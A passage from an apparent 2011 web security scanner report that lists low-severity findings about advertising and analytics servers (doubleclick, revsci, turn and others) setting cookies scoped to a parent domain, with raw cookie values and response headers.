ANON_ID=aGnrXgoNIZdfBa4YmZbgVxcyf3SLwZdPcZa1p4FUN1nH6BKL99QGadNWl9yo3fBDn7Y3UJeZbZcCoXbSNwE1vRGSBZcmjjuCRKbmI4ZdtEyMiVKZdTyycEB2iqOwjFKMr8x29LUleFNjHZaCaf4FULU7xS1AOxcBD6gFuK0ZbSqKAZa68ilZa4mP6ZcTU17RBO9TgOjVruNS2ZajkYyDUytBUSuZacP0hu140iTRF2pYWO1yHev1ZaOlPrZc7SWWL92ekwVRkr9oeM2EcZb5Za2DAvBFp5Bw4vL1ygtt9NEIehOpogZcJHZbWJNlJ0abaOUeXgcpsejKw33NxdSU9JZdfYk8A3CAu3sbZbryTWEaZc72b5mG3cEUeRXvbdSZd2MSnqvjjHqZd2RmbupCQCuAZb8n1PyaNpJGLejc6yD3f13Wq7wuh8mYPSK1AANFk9C3OffGNHZcidw5WnbkZdiRVsV9nsMG7aqt7iNZcpg1xm3CZa5uJcaW2FZapdtdT2Umk27yNPkD28FZaI9FZcAPLStwLOONi5ZcAskoZaHDTnM2Dd7thK1jKZbCLZaJecWJeeDxyMlJyO4aaWE9eHGbFD3aMY4Hq8vZaMb03HGybi5ZbHZbhZbi9YF30xyK4I3q9Tfy9OlNnLLAcjJrPEMR4IkPktMR4VFkNOEOsS1wNww5mH0VvjZdYqZdWicM4qsKOHZc2Ldd8ssGmXwZc8onsZd8DBjif68WDdhvTKseAhrH8KG0FZaA6sDMdOdgolUqxp3GQpEM4RcBvWuRXgaetUOJRblZb9; path=/; domain=.tribalfusion.com; expires=Wed, 21-Sep-2011 13:44:36 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.3. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fut.gb.tr/news.Internet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=ca39e2f390000cb||t=1308836889|et=730|cs=5fddn5r5; path=/; domain=.doubleclick.net; expires=Sat, 22 Jun 2013 13:48:09 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 22 Jun 2011 13:48:09 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.4. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_5s5d=c8z%3A207o4%3A1; Domain=trafficmp.com; Expires=Fri, 22-Jun-2012 13:09:42 GMT; Path=/
rth=2-ll8nk2-c8z~207o4~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-dlx~fde4~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Fri, 22-Jun-2012 13:09:42 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.5. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 20-Dec-2011 13:44:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 20-Dec-2011 13:44:52 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 13:44:51 GMT
Content-Length: 343

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2390519639826626360&fpid=12&nu=n&t
...[SNIP]...

10.6. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_oJjm="MLsXtTPtJzpvJZG+wNyGBujwiYNk7SFCxPYIhapH/IGgu8fvW/7KPaGxWqTZFTkDb1sV9WOkX/+4J9exogBS/W8+PGyhBWzrdaAnGae4NpMotzSX3+fbscKgY/DWqapdjtT2qzUsVTV6Th6TO+kyXRu9fLtLw7vLwXnP5fnsu9+NlSRLiaJDkMuFliEf9YvaMjspmYt7E04OrDV/IsZUzRCiACYJUbSk06G9ZmN9h9NgyIr5FvCdnll+3wHTsoDnywXw3tZMJoS03uc587n7YXcmOxPh3+MOvoXktyzzD4Z48gvSLJMJpwFjzLw/OQQSvlSH3Vyqzvz+B6NOezUmDnMM6DJabgBJH880uYDKg90Dsd2YVnT4fgILqcaPrnmYkodFavvqHEWjmSPwbYF02muaHAAF4tpqRPcq09KqJ1xU6gCiS54lEYaZ8EWjqLJmJmw/He8mJ2nubAESlT4mv+uYQKNjhqAJ8MAd72HjqFV/GxMRX+29jo9VCZG1OuoNOD3mx5KMUSaJmeIPt50vJFqPkGH0gOY9/jGKFx5TxJvidm+LSTFySpjOAqKL40vw7tUKcBkSUKNKBjFo2q79oM6rPyJ+sVOYW2NdkC+jxXGHWO2asCRCSJVivoCWRUP0TiUR/zP3qRxiynPLU8lQMRG/whXlNxRV7fQl135FeZrQH0b0BlJ/VBo6GhbwAR0TsdWcsfdXrqOTgGOCkVyG2IzFJ+l2/pNhq8A3ZImb9RO7rHEbuPHlmswMqfghlJsgUwz3on17Tfo+WMi7tRJ/tarVetQFrFoymgmMLwpXGBzwOFuQgKts/0kN2e1apqwUgyRvLvuFjDu5vOyGhFqczB/jg3EAXtmuo5KolGEcMBVBy2i0HKK38Yp1vVpITc0foB+i3o0LHSeCfptjsnGPDPCRNqDxBkV/GL7SrC570lKpwTKPmMBpekAMsPSWWsdhaMJHlI2YGZv5XZCJ6e/bhx/Bwc8B1ECZtV8Os1TKs8GGtfNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSoJRpS6MEOY9qIEJnzfEO5CspC14SRNUYfy4EN2YSMeFCwbHaTRq6PBlI3YSnbBgBjEUOdiRfZYFBw3z2kq9Xwik18Hwnd3LCfOMfi8ZfOrZm02ilpkHrAxvmWcMWZ+siww8KxcTCXYrhwRUe6w8/3f0lpRamp1EhK02b16hIAO5QosZIfkUX+H3kUTDm6dNiQRpTWp8CMcp0Fc4N9hiKef3Gn7KSeB8Pi4SQmYOlJQisnsHlYi5EnUaloxDPDlETisJnGzC4xvinBGMuB4TBQrFgzVk1JfriXBtIM5rlOI0ZnpqXkwme3oGAAT9d0tJzJTxzaXzrGoxD9FhCY6YcJK+VoFezEglxBSlCKHbhSjYjoAy/nBghesQCOg1UOKHb0MONmzl0k6RjPkfbUQAgKCfxGIkc95u66lxjklLwoA0ttUIqQOlfuRFQ4AuT/4bi0yM2KwZb5/f33lauy9Y5aoa8S7qyOhHFR6gSeN9xEjs+6zNAyp1fasWiQcitQN19+KbXB8xbuNe9mgBZMjxoJhR14xEh72F9ZyN93eqG/MpGh9hTIXcOfiU="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_MY90=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_x5er=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lwqf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6hCD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MY90=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_x5er=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lwqf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6hCD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJjm="MLsXtTPtJzpvJZG+wNyGBujwiYNk7SFCxPYIhapH/IGgu8fvW/7KPaGxWqTZFTkDb1sV9WOkX/+4J9exogBS/W8+PGyhBWzrdaAnGae4NpMotzSX3+fbscKgY/DWqapdjtT2qzUsVTV6Th6TO+kyXRu9fLtLw7vLwXnP5fnsu9+NlSRLiaJDkMuFliEf9YvaMjspmYt7E04OrDV/IsZUzRCiACYJUbSk06G9ZmN9h9NgyIr5FvCdnll+3wHTsoDnywXw3tZMJoS03uc587n7YXcmOxPh3+MOvoXktyzzD4Z48gvSLJMJpwFjzLw/OQQSvlSH3Vyqzvz+B6NOezUmDnMM6DJabgBJH880uYDKg90Dsd2YVnT4fgILqcaPrnmYkodFavvqHEWjmSPwbYF02muaHAAF4tpqRPcq09KqJ1xU6gCiS54lEYaZ8EWjqLJmJmw/He8mJ2nubAESlT4mv+uYQKNjhqAJ8MAd72HjqFV/GxMRX+29jo9VCZG1OuoNOD3mx5KMUSaJmeIPt50vJFqPkGH0gOY9/jGKFx5TxJvidm+LSTFySpjOAqKL40vw7tUKcBkSUKNKBjFo2q79oM6rPyJ+sVOYW2NdkC+jxXGHWO2asCRCSJVivoCWRUP0TiUR/zP3qRxiynPLU8lQMRG/whXlNxRV7fQl135FeZrQH0b0BlJ/VBo6GhbwAR0TsdWcsfdXrqOTgGOCkVyG2IzFJ+l2/pNhq8A3ZImb9RO7rHEbuPHlmswMqfghlJsgUwz3on17Tfo+WMi7tRJ/tarVetQFrFoymgmMLwpXGBzwOFuQgKts/0kN2e1apqwUgyRvLvuFjDu5vOyGhFqczB/jg3EAXtmuo5KolGEcMBVBy2i0HKK38Yp1vVpITc0foB+i3o0LHSeCfptjsnGPDPCRNqDxBkV/GL7SrC570lKpwTKPmMBpekAMsPSWWsdhaMJHlI2YGZv5XZCJ6e/bhx/Bwc8B1ECZtV8Os1TKs8GGtfNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSoJRpS6MEOY9qIEJnzfEO5CspC14SRNUYfy4EN2YSMeFCwbHaTRq6PBlI3YSnbBgBjEUOdiRfZYFBw3z2kq9Xwik18Hwnd3LCfOMfi8ZfOrZm02ilpkHrAxvmWcMWZ+siww8KxcTCXYrhwRUe6w8/3f0lpRamp1EhK02b16hIAO5QosZIfkUX+H3kUTDm6dNiQRpTWp8CMcp0Fc4N9hiKef3Gn7KSeB8Pi4SQmYOlJQisnsHlYi5EnUaloxDPDlETisJnGzC4xvinBGMuB4TBQrFgzVk1JfriXBtIM5rlOI0ZnpqXkwme3oGAAT9d0tJzJTxzaXzrGoxD9FhCY6YcJK+VoFezEglxBSlCKHbhSjYjoAy/nBghesQCOg1UOKHb0MONmzl0k6RjPkfbUQAgKCfxGIkc95u66lxjklLwoA0ttUIqQOlfuRFQ4AuT/4bi0yM2KwZb5/f33lauy9Y5aoa8S7qyOhHFR6gSeN9xEjs+6zNAyp1fasWiQcitQN19+KbXB8xbuNe9mgBZMjxoJhR14xEh72F9ZyN93eqG/MpGh9hTIXcOfiU="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4ilHMAYUro/ilB0Ovd8onIwIjpdK1UYjvtvC/kpFI4lyOCK0yxmLLfrYxyUWQuB7DE92NIRK/sSMTh621RFIIhPAGMOScjAP7MPVFOK0x9gNoW7b1rgdrDZyIAOp9qs86evFMACnI4CF3FTlWgGBT0BUeS+9VjfUpcGhYoQo1WhXs6fyBUyjWBUf7ziNBZpxYjW95JqVgRKmRFrv2clqUkSpLBBtRgQBJ9Ienz1U8A7o3hKO6wfQM5+D9nX78ebFN2+YeE2eGPzlbffbPZRWBjtgd4XZCKoEo4pL4FwIGVIcfKnoK8v/CojHQEj07kXAbCRVqRF3IPKysjJ7hlRf/DqtA+Glpjo7ZLJ5KWpr0sSmJnZTDlIWigTRdOa9q8yfVZ+8fN+6qW3ZogppXI+Fj28cIKq2efjC5NuXeJmte652EPwjTB1C3J0Z9fun9uGwj19lR8VEC/CFzZDjw/pg8JqCFLrag37IMvLo5js1LY5D3OlONE1ngVXKBBWQuX1OlDZ5vDYblp/xjvrNWJ6ejeO0nbCZVhEzCBtLjwKU7VxtTQ1278nWO3NNiz4lGMJCapHHGm4F7TEIS7wMXJDGy7OdDGOnPprjAgUc5vmyCQoiLuZALwsNnyEFP2metczO5OTpca5YCu2Z0WFdA+X1S9HfjeH9aibJ1Lwnsy0BJxqhvP20u/LoRqLm9a00MrNdt/TJS5OfkP0G1zRDhY1g9laQxZQlWTxOdXqUZwykHP6bKbcE0vnGPpgN/PRnfA76+i88jL3B1kEFTCK3J1Vv0a8xmXxJWf59tNLexse2UGxp8FF8GqiYs73FqKosPS/P+43JZ3WJfXukjBALD/rUTYwrFmbJxo6UuvCRLFzYTYaZ0VaLrJPP0uDeRt0pApaB8GyHKfgsEjdaJGQDYIOV1playfYA3O6+9tpWwz9r2vFnPBRRRehpTBcCqBXtcv3G/gyfXMLJ+R6v10xJwRJOeV6vERc48uzsfemXZE/N1rTnUGTmAKUZX2m2/yVLYalQdekmbxG0RMntmaI3Ix1TAHdEm0KCWcz9IicFycnZjvDzdq7UM3d94tFHktV5njewdsmZ1FvNBShUWDcj+j/F6UtggGx+JSWJVOlP6vNix0CcW3eanJ4EIQBikTnl/DB0aYFFQY9U16SQlrpedeZ7SK4J4lTYXrZSNtjJmi6b5mvLpfuW6eZBgLXyO6vAlX//UMOgJ2a6vMB2wWSunR5ELtxnOrP/gXAR7ZQcXMOBbGK1lGnj0cMSvl2AJx0gP/3UVVDfiHmaFBCMPS9/12MdSUz7iLeHiP3p94rGOuAy0sy34EiVQ3WwVQIsdEmif9i7/oAdh1Nzs4rCcMBMzyvTmvpCgA0V6f30yOb0M3uUp6yCLK0+o59ezKJzMhX6i0yppj5GGE9YZGXKCoJt5WcFzCNw0bh6nN1cQ4a8X3rwmEtXoDJB36Xy0EpIrTP6Y+tkviIaTYKf7JiSm4i0eK7PtKVJ8vH40QfdnTkQ5AvpqOhRvO1A13XCSlW0oT2gS1AvJkBuwe4pM6N/VDoiM0V5LXSkHYl7JHR7+0mGFXjCr47/WcR0KYYzaN2v/pyojJU0InEsLXAOdmKGcZwDlKKVQLfZXCXrndgP0hSLZGbAVam2z0efr72V5L+FRZjVSjYAsRlFo1ZAS7a80QdCnNMfJUo25fsd4i7LKGvhYx4GAfcY4fa3sS6aLgcRZTbW6q3mj2ppueghT+hrtmeO/3mU2RHZhHBoSyng7gzUMRbskS6spLwJNwWJRyQmWwXQ+JO37hQNV6uC//zlW7dFwTAPe4uVCL7KrVZc6E7Yx3SE2HCMfNFdE+NyWmQbF79s7vlWQOdgbF0mfKEuT+nLwIwohtSefdgNlf0ywF51pJhoLQH+0CghH6xH//2L5WEOF3uuXFAwTB57dCKFadBTPSkJDRHzOd764LInw3IDyCOguGOayImrcGQ9bRqUlzlimHQgpD7TEYC9m4pBOgBbTb53qN8/hF3IDg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 13:09:39 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

10.7. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_1Kc5="MLsXtTENJApvJ5G+CtKgxLFQnfhOvCZv6FO6CurHXyYWkAe+Easvolr+8h/hlLolJXfHH1R2xVtDscJ70PLT/+809mgUaJ5mTFeMH5/cdQ1oQMzjQrR8lT1kMQ7bzpbC9YrXitTYyvZMM7dP4X0FE4fLVQT35pwmHJMjeULAg9+Bg9j2pt4T+Bil+yJVkZKHhA6o678iRjiJMPfG6wwANbikhywOGtfmMiOndWnapurGYT+mXqNaIxywxWjyHixOV2MmttktQ7n/s1JIyPfuNTy6RoZFymhaYv4K1CxTW5D2KVK5tCgCbyuo1rwC69C+v/IuDeE6aJ61YjmUNAIN4AFAIXUYGz1WZlcVZqPfVcL8IPe6zX7fXbCi2bc8ywC87epLflVMoerTEodXeL9SBn70Xhw5lcP15HielZUpYNyDg0N0zZUIM+0JsxprAQSiEgnYvoprWsXU6DTVmIFEsuidLnUJlYYOJtxZEDkEABBv7NT27l8LGl/yIDZhjgij0HYVYfLzzBGc3/Zi5OKew/Am5f0lo+6Yw3wf1tLyLatjtijbv95GzxvjVBoKEgmj2uhUORLdFjkAwAh309Sb+i/PE/BXzcebGGN9+yusxQ83We0isURCSAX4EPCjXKTXe644RprGK/ovXStUZLTpD35VCFkTrUaO8VqMv/hl9kYcwQ2n9IAaY+/NgH86zYd6G9X3H6Sssap4VA0D62aDit0V8PHhJkjIsGKEKgwWP2ZRWiZsUrnTcRiFgWghVJQgUwxPA89iBBfCp6OV79l3ch09a8prWj4WzUFShpHgZWm6G857lM/Up/cD6d0nqw/UdxHf8B+jwrHBdltXD+FuIWKXFb+RwRd8ynfoc9VsphzmXzOSgPkYuxQ7hsHV0Hq/HJHSzW/LYXy/9h2M8O+tc+1oIlmaxhfvZiMqStfUsdh9L0klPVQG17Jaku/axTNUBasimo15hj6/R/83msTCxsK/ibsuarY2lOyAzY6Q0sKGiLBGtg5AD/GL1k3MunISFgHwVvqkOES3D7Xaxd2FOgJUok1kNo1Cm+EVSt8/RqmzMs9cQZRcQa7d3Zqw69m/rMnt1cqAjaZReekrd/gx95bcJSqtCoLaHTwGIgtKx8TbbafXtrBLKj7lRHF2yEOzwn+Hva6YZQOzh6L5z62t2XHyf4l49gbIFGQQ4gEl6lt+9qOiV/etCO5e5tcsubEmJ1O7NU0L0y32gbvVu6ZghCHF6eErhYxKB+uF99qGw7fT6qEwqjoP2cjDX3M1CA4qMQBfMOZr4xEG93vu+i9zYjr9xFJHA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW+DKNi6xLKXmhCJt0YP0gMlFmQMsihPn4MV2v59cKlLSELXAgqbss7TVL5/B0TuuGU260dpfoFeu/WPk7u692kEmK/35h0RMwc0jbzF6vxnRGrAaILWXqGPCqh6+m6klAECZ3k8Pip7U9FzhBNFsrRNlmJKqdqKMFjwz5rabHXZLVOXOXedIPKkEK/6XjPQsOHXAgqbxODNSx6V/1JTWTSDMGCmB+byRP++NOZtgq4TmLWKiCCOorMLnJvQPErJgDh+B8gA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMV4imj8AcUrmz9liw1aYw2dfGs5o1K6s5f5viZ3MBhNMqNP/8IRH+YekfHa69PUf2xk+ZaltbSV3CZr0FJCVOcSTPDDRbhUErtDmujVWqHGZsMTxbri15fYttaGFghw4wXRVEkdhiAbbwWu0HbakBuL14npa4kk39j8rFKq0/e/wfPtvUbaEJhM3g3prj3UxV4VpdHU5ITb7LaIWBifDclktUdVAUl40O83+rjdeJ23j5cq6v72nobOGhClnMZb8o+QnQfn9vq5kIFgZpDmljNbrJ4qiTFBPXS/XajRZ9BuH6WrP44PiedSp1EpxUB8OJWEs4yU9qoV0hQdjd7hlRdDDmtQ+GlpDo5GLJ5KWtvk8SmJlZTDrIWigSxdOa1KcxZVJe8fN96qG3ZogoVXI99j1EUPMqWePnC5OuXeJGte692EHwsTBxi1J0h9ftHdWGyyR/odXOZaFeEuILin/hIcv1FSaez44d7ii53/GQFxaOOW/TdpY0rwjYuBKWXDon9zV+93lBgO309zAO5A4kkwB+sF83/921Z6gQP+/xAKWNJNPhp1j12eX6LxGPHomvor4gsTXJNVmdUfs4DIxJNdhfnWV2nJIYN8vtefOHHwRrOsJsLsGNv9SSw7F86e4iUeLoQYiLw3pegD+59Eb/70v4NSb/SEq4X1Dvc1eH8Q5wWQjTpOgIYdToKEluotZK/ZWsCLhuruvxMd/KYLw3m9QOaQlpap9GX/ciF2hpV5j7f0HE43vMrfmH7pWxycS7pzlZia7gr5teSppD0GIHC8OiSe2jzOwKNch3h0ky58RXmLfTT7LNNcfYhvEioUfFPUIogz/Y6HigBHgK4LFsTQ6lN8QqrnE00HUbjWp8/HEscBYIZCybnb3WLkwFnxo1QrtA1UuuKqjYAoTeN5qTVLUaM1qKua4dofRCsbN/jw5J/KCxpu6FooJc84uyG99FY3o5vfCKdJ4HptfTSXqV5FS5Y7vnqjPR73yYoidtGSjwUdy323GVoioLNx3ywBD3vYSORMCZwFOpTJmqmI4QQYOs1kp3o9rbUOtL4SIOfk0B5tv9e1Hci/tdBPhjxnK47l9GTL5l3jJiSkR04F5PHWLNE0pJMtqaa7HrGCdN/rLXctsYVlJKIwNbN89+52Quv4mElFYxogizUw9Kkhlj9bEh0DMJVetaXKxKgasm+4UrrEiO/svzrAqpT1kkMnxHTTK5Hf1mfCPAqlsTRZmrkOKav+s7EdBska8qHjdqfLS+ULsa2B4IPgBUvlb5JBY90JaS+lIOYqmI0sGCuBQm/BniUcOaFq2wr+dChvCXH9c/ziWsyx67uRyqSH7vYdvURv2eK4/pBvkisjDuMT7P94BQ9NJNGBUL+RzfLhi58yn0eAKMSA+/+41bQKBe/HGU/qX0uf3o8IyManT5Kb9Y5Qzy7m+4SPW+GtrJboCHhk0BeGUwCrlbA5uAG8PeNpB4GjPsiv4khR7jQkZIQKMw2ZDd4/f6kscQ0AP4fRjbVxlASqcFAq3rkGgQyV3tFNZs6OyoUd+Fns9FTsRefztNSp3sRAZWSemk7O4501wjhUAD+9ScHdHrDwzYJ1DEOp5cULCUwQR0iBwcIwP9yENfV7qD5pGbclaX/fMQ8zGaCoiT2x+8rOcOVW6wjZt4d+F6bvIfhEz1IePXtH0f/WDe/ssZ3p5VNU6EnZse7vtoC0ex9RZmYX30b1fGhgNJjAMcZdXAD9pjgOgoTpyUNK36Qokj/Qba5auA+FKblw/+CiWE4+Hb43ZzXA4PCFAlvuwNdCsQjr1sMO/3MmQGbrNo6FedyfBRQU6ChfQEnE4OdLtFJUoUinHWjSM7sv4B9IBESn3asw++7kOWv9mC9+TCUef6vSORtxINmmuD5uQg5z2tgX0J/Vj92MtHEeGFLozcMczQ2+wkP3sBOvJeocxIzHYtdEXfiPmUgcZIIoQh+DAbjKAMj9+XIuhQLr/FsOurshu62U74+45J7nYuUBsb6wySeqvXk"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.8. http://ak1.abmr.net/is/tag.contextweb.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.contextweb.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-659F213F13AEF608515B2A1D42365F3AD36653678D8F0804D1131815B41FA314-22ECE0AB9E28375ED7A4C7AF800948510BF0A2483DE5E3A27F6657AB3FFD20BF; expires=Fri, 22-Jun-2012 13:44:49 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.9. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 22-Jun-2013 13:08:29 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.10. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

